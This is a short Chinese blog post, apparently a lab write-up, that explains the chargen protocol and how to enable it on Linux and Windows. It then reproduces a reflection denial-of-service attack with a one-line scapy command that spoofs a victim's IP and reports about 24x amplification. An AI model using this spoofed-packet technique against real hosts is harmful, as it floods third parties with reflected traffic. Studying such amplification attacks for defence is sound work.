chargen 拒绝服务攻击复现

chargen 拒绝服务攻击复现

什么是chargen?

字符生成器协议,是RFC864中定义的网络服务。用于测试,调试,测量目的。可以使用tcp或udP连接,服务端口通常为19,会返回随机数量的随机字符。

启用chargen

  • linux开启chargenundefinedlinux下通过inetd使用,路径为/etc/xinetd.d ,通过编辑chargen-config或chargen-dgram配置文件进行开启。

disable改成no,protocol选择yes.

然后重启inetd服务,service xinetd restart

  • windows开启chargenundefined需用在windows server下开启,归属于simple-tcp/ip服务。 使用powershell进行安装。

Install-WindowsFeature Simple-TCPIP

然后运行services.msc启用该服务即可。

记得关闭防火墙。

协议漏洞

使用nc发送一个请求,返回大量如下字符:

使用chargen进行dros原理正如上图,当往19端口发送一个请求,会返回大量如上数据。

攻击复现

使用python的scapy伪造源ip发送udp数据包:send(IP(src='192.168.216.130',dst='192.168.216.135')/UDP(dport=19,sport=7777))

192.168.216.135为开了chargen的服务器ip,192.168.216.130为受害机ip

在受害机上抓取pcap如下:

放大24倍左右。

原创声明,本文系作者授权云+社区发表,未经许可,不得转载。

如有侵权,请联系 yunjia_community@tencent.com 删除。

编辑于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏钱塘小甲子的博客

四种波动率

        草草地刷了一遍SHELDON NATENBERG 的《Option Volatility Trading  Strategies》,书的内容还是...

12120
来自专栏云计算与大数据

DNS TTL 最佳实践

根据 CDN 小伙伴提供的数据发现,在印度,账号域名的 DNS 解析时间要比淘宝慢 174ms。

1K20
来自专栏钱塘小甲子的博客

Backtrader量化平台教程(一):backtrader的整体框架

版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csd...

79110
来自专栏求索之路

《学会提问》

13220
来自专栏比原链

如何在基于Bytom开发过程中集成IPFS

比原相关资料:https://github.com/Bytom-Community/Bytom_Docs

10940
来自专栏无原型不设计

​Mockplus新年福利来了!见者有份!

2019年春节将至,Mockplus在大家的陪伴下又走过一个年头,为感谢大家对Mockplus的喜爱与支持,给大家送福利了!

16130
来自专栏知识分享

ESP8266开发综合篇(SDK开发-视频教程总揽)

为了解决基础教程简单入门但不实用,项目方案非常实用但比较难的问题,开始推出8266开发综合篇

43330
来自专栏小怪聊职场

JAVA|Spring注解踩坑记录,涉及到的注解包括@Autowired、@Resource、@Primary、@Qualifier

我在另一个应用中把数据放入到Bean2 redisTemplate对应的Redis中,于是我在这个应用中使用方式如下:

33620
来自专栏ios 技术积累

更新CocoaPods 报错bad response Not Found 404

之前添加国内ruby源 gem sources --add https://gems.ruby-china.org 报错:

17920
来自专栏程序员的知识天地

程序员强推:15款android设备上的代码编辑器,超级方便!

如果你希望你的Android设备,如智能手机和平板电脑,在任何时间和任何地方都能够编写代码,那么,不妨看看下面我将介绍的15款Android代码编辑器,它们必将...

4.3K40

扫码关注云+社区

领取腾讯云代金券

年度创作总结 领取年终奖励